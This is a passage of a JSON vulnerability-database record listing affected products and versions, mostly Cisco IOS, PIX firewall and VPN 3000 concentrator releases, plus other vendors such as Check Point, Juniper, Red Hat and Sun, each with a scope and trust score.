            "vendor": "cisco",
            "version": "6.3\\(3.102\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.7.1.f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3tpc"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.2\\(2\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.2\\(5\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0\\(4.101\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yi"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.1\\(4\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(2\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xj"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.5.2.f"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.5.2.b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xh"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5\\(rel\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3\\(2\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1\\(5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xw"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1.7.a"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.6.1"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1\\(3\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1.7.b"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1.5\\(104\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yg"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2\\(3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ys"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2.2_.111"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.3\\(1\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0\\(2\\)"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.1_\\(0.208\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.3\\(2\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.1\\(4.206\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xr"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fortinet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openswan linux ipsec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (x86)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r54)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55w)"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.00"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "30003.1"
          },
          {
            "_id": null,
            "model": "ios 12.4",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "30003.0.3"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.3"
          },
          {
            "_id": null,
            "model": "ios 12.3xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(7)"
          },
          {
            "_id": null,
            "model": "ios 12.3yk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.0.4"
          },
          {
            "_id": null,
            "model": "vpn concentrator 4.1.7.a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3000"
          },
          {
            "_id": null,
            "model": "ios 12.3xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "ios 12.4 t",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0.1"
          },
          {
            "_id": null,
            "model": "ios 12.3yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.2"
          },
          {
            "_id": null,
            "model": "ios 12.3yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(5)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3(3.109)"
          },
          {
            "_id": null,
            "model": "ios 12.3xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1(4.206)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "ios 12.3xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(3)"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1(0.208)"
          },
          {
            "_id": null,
            "model": "vpn concentrator .b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0.5"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.4(8)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(4)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(6)"
          },
          {
            "_id": null,
            "model": "ios 12.4 t2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(9)"
          },
          {
            "_id": null,
            "model": "ios 12.3yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(5)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(4)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.0"
          },
          {
            "_id": null,
            "model": "ios 12.3yg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.6"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(1)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.4"
          },
          {
            "_id": null,
            "model": "pix firewall b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.6"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios 12.3xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3 t5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "ios 12.3xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(1)"
          },
          {
            "_id": null,
            "model": "ios 12.3yw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3 ym4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.1(3.005)"
          },
          {
            "_id": null,
            "model": "ios 12.3yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30002.0"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.7.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(3)"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(4.101)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "ios 12.3ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.3(110)"
          },
          {
            "_id": null,
            "model": "vpn concentrator .b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.1.5"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(3.210)"
          },
          {
            "_id": null,
            "model": "ios 12.3xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(3.100)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "ios 12.3yx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator 4.1.7.b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3000"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ios 12.3 t8",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "ios 12.2sxd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3 yq4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sxe",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3(1.200)"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.1"
          },
          {
            "_id": null,
            "model": "ios 12.3yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3tpc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios 12.3xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.5(104)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "ios 12.3yq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.7"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.3(133)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(1)"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "_id": null,
            "model": "ios 12.3ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.4(7.202)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.7"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "_id": null,
            "model": "ios 12.3yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.1"
          },
          {
            "_id": null,
            "model": "ios 12.3xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.4(4)"
          },
          {
            "_id": null,
            "model": "ios 12.3xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.1"
          },
          {
            "_id": null,
            "model": "ios 12.4xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(1)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3(3)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2(5)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3(3.102)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3(2)"
          },
          {
            "_id": null,
            "model": "ios 12.4 xb",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "_id": null,
            "model": "ios 12.4t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.7.1"
          },
          {
            "_id": null,
            "model": "ios 12.3ys",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.2.111"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.5"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3(1)"
